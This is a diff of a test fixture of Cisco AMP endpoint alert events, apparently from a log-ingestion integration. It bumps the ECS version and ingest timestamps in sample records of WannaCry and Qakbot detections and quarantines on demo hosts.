 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
 "kind": "alert",
 "action": "Threat Quarantined",
@@ -618,7 +618,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -638,7 +638,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-12T17:31:54.500141093Z",
+ "ingested": "2021-09-13T18:07:28.111147798Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
 "kind": "alert",
 "action": "Quarantine Failure",
@@ -697,7 +697,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "user": [
@@ -729,7 +729,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-12T17:31:54.500143175Z",
+ "ingested": "2021-09-13T18:07:28.111149933Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":214000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}",
 "kind": "alert",
 "action": "Threat Detected",
@@ -786,7 +786,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "user": [
@@ -818,7 +818,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-12T17:31:54.500145233Z",
+ "ingested": "2021-09-13T18:07:28.111152028Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}",
 "kind": "alert",
 "action": "Threat Detected",
@@ -871,7 +871,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -891,7 +891,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-12T17:31:54.500147317Z",
+ "ingested": "2021-09-13T18:07:28.111154118Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
 "kind": "alert",
 "action": "Threat Quarantined",
@@ -942,7 +942,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -962,7 +962,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-12T17:31:54.500149522Z",
+ "ingested": "2021-09-13T18:07:28.111156357Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
 "kind": "alert",
 "action": "Retrospective Quarantine Attempt Failed",
@@ -1017,7 +1017,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -1037,7 +1037,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-12T17:31:54.500151606Z",
+ "ingested": "2021-09-13T18:07:28.111158472Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
 "kind": "alert",
 "action": "Retrospective Quarantine Attempt Failed",
@@ -1092,7 +1092,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -1112,7 +1112,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-12T17:31:54.500153674Z",
+ "ingested": "2021-09-13T18:07:28.111160543Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
 "kind": "alert",
 "action": "Retrospective Quarantine Attempt Failed",
@@ -1167,7 +1167,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -1187,7 +1187,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-12T17:31:54.500155748Z",
+ "ingested": "2021-09-13T18:07:28.111162637Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
 "kind": "alert",
 "action": "Retrospective Quarantine",
@@ -1240,7 +1240,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -1264,7 +1264,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-12T17:31:54.500157824Z",
+ "ingested": "2021-09-13T18:07:28.111164728Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
 "kind": "alert",
 "action": "Retrospective Detection",
@@ -1321,7 +1321,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -1347,7 +1347,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-12T17:31:54.500160068Z",
+ "ingested": "2021-09-13T18:07:28.111166874Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"}}}}",
 "kind": "alert",
 "action": "Retrospective Detection",
@@ -1402,7 +1402,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -1426,7 +1426,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-12T17:31:54.500162155Z",
+ "ingested": "2021-09-13T18:07:28.111168956Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":763000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
 "kind": "alert",
 "action": "Retrospective Detection",
@@ -1481,7 +1481,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -1505,7 +1505,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-12T17:31:54.500164235Z",
+ "ingested": "2021-09-13T18:07:28.111171040Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
 "kind": "alert",
 "action": "Retrospective Detection",
@@ -1558,7 +1558,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -1578,7 +1578,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-12T17:31:54.500166300Z",
+ "ingested": "2021-09-13T18:07:28.111173128Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":718000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
 "kind": "alert",
 "action": "Retrospective Quarantine Attempt Failed",
@@ -1633,7 +1633,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -1653,7 +1653,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-12T17:31:54.500168364Z",
+ "ingested": "2021-09-13T18:07:28.111175203Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":765000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
 "kind": "alert",
 "action": "Retrospective Quarantine",
@@ -1708,7 +1708,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -1734,7 +1734,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-12T17:31:54.500170457Z",
+ "ingested": "2021-09-13T18:07:28.111177282Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":749000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"5